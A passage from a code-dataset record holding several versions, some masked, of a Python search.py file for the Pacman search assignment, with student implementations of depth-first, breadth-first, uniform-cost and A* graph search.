required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def breadthFirstSearch(problem):
"""
Search the shallowest nodes in the search tree first.
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Queue()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def uniformCostSearch(problem):
"""Search the node of least total cost first. """
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), 0)
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
<|reserved_special_token_1|>
"""
In search.py, you will implement generic search algorithms which are called
by Pacman agents (in searchAgents.py).
"""
import util
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s,s,w,s,w,w,s,w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"*** YOUR CODE HERE ***"
# Frontier stored in a Stack
frontier = util.Stack()
# Visited states stored in a list
visitedStates = []
# Format of each element: (current coordinates, [path taken to get there])
frontier.push((problem.getStartState(), []))
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def breadthFirstSearch(problem):
"""
Search the shallowest nodes in the search tree first.
"""
"*** YOUR CODE HERE ***"
# BFS is identical to DFS, save for the data structure used to store the frontier
# Frontier stored in a Queue
frontier = util.Queue()
# Visited states stored in a list
visitedStates = []
# Format of each element: (current coordinates, [path taken to get there])
frontier.push((problem.getStartState(), []))
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def uniformCostSearch(problem):
"Search the node of least total cost first. "
"*** YOUR CODE HERE ***"
#UCS is similar to DFS and BFS, save for a few key differences
# Frontier stored in a Priority Queue
frontier = util.PriorityQueue()
# Visited states stored in a list
visitedStates = []
# Format of each element: ((current coordinates, [path taken to get there]), cost)
frontier.push((problem.getStartState(), []), 0)
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited.
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
# if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"Search the node that has the lowest combined cost and heuristic first."
"*** YOUR CODE HERE ***"
# A* is different in that the heuristic argument provided is included in some parts
# Frontier stored in a Priority Queue
frontier = util.PriorityQueue()
# Visited states stored in a list
visitedStates = []
# Format of each element: ((current coordinates, [path taken to get there]), heuristic function)
frontier.push((problem.getStartState(), []), heuristic(problem.getStartState(), problem))
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited.
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
# if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier. Here, unlike UCS, the heuristic function is added to the newCost variable
newCost = problem.getCostOfActions(pathTaken + [direction]) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
|
flexible
|
{
"blob_id": "e7b96c0161e65f3f22f2ad0832fc6d1bb529f150",
"index": 9772,
"step-1": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first. \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), 0)\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction])\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef breadthFirstSearch(problem):\n \"\"\"\n Search the shallowest nodes in the search tree first.\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Queue()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first. \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), 0)\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction])\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef breadthFirstSearch(problem):\n \"\"\"\n Search the shallowest nodes in the search tree first.\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Queue()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first. \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), 0)\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction])\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n",
"step-5": "\"\"\"\nIn search.py, you will implement generic search algorithms which are called\nby Pacman agents (in searchAgents.py).\n\"\"\"\n\nimport util\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s,s,w,s,w,w,s,w]\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # Frontier stored in a Stack\n frontier = util.Stack()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: (current coordinates, [path taken to get there]) \n frontier.push((problem.getStartState(), []))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n \n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n \n frontier.push((coordinates, pathTaken + [direction]))\n\n\n util.raiseNotDefined()\n\ndef breadthFirstSearch(problem):\n \"\"\"\n Search the shallowest nodes in the search tree first.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # BFS is identical to DFS, save for the data structure used to store the frontier\n\n # Frontier stored in a Queue\n frontier = util.Queue()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: (current coordinates, [path taken to get there])\n frontier.push((problem.getStartState(), []))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n\n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n\n frontier.push((coordinates, pathTaken + [direction]))\n\n util.raiseNotDefined()\n\ndef uniformCostSearch(problem):\n \"Search the node of least total cost first. \"\n \"*** YOUR CODE HERE ***\"\n\n #UCS is similar to DFS and BFS, save for a few key differences\n\n # Frontier stored in a Priority Queue\n frontier = util.PriorityQueue()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: ((current coordinates, [path taken to get there]), cost)\n frontier.push((problem.getStartState(), []), 0)\n\n # while there are still states to explore\n while not frontier.isEmpty():\n\n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. \n \n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n # if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier\n newCost = problem.getCostOfActions(pathTaken + [direction])\n\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n\n util.raiseNotDefined()\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"Search the node that has the lowest combined cost and heuristic first.\"\n \"*** YOUR CODE HERE ***\"\n\n # A* is different in that the heuristic argument provided is included in some parts\n\n # Frontier stored in a Priority Queue\n frontier = util.PriorityQueue()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: ((current coordinates, [path taken to get there]), heuristic function)\n frontier.push((problem.getStartState(), []), heuristic(problem.getStartState(), problem))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n\n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited.\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n # if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier. Here, unlike UCS, the heuristic function is added to the newCost variable\n newCost = problem.getCostOfActions(pathTaken + [direction]) + heuristic(coordinates, problem)\n\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n\n util.raiseNotDefined()\n\n# 